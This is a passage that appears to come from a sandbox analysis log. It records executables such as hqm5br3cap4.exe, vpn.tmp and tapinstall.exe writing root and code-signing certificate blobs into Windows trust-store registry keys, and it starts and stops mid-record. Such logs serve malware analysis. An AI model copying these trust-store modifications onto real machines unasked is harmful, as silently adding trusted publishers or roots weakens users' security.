6f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B hqm5br3cap4.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 hqm5br3cap4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E hqm5br3cap4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd hqm5br3cap4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd hqm5br3cap4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 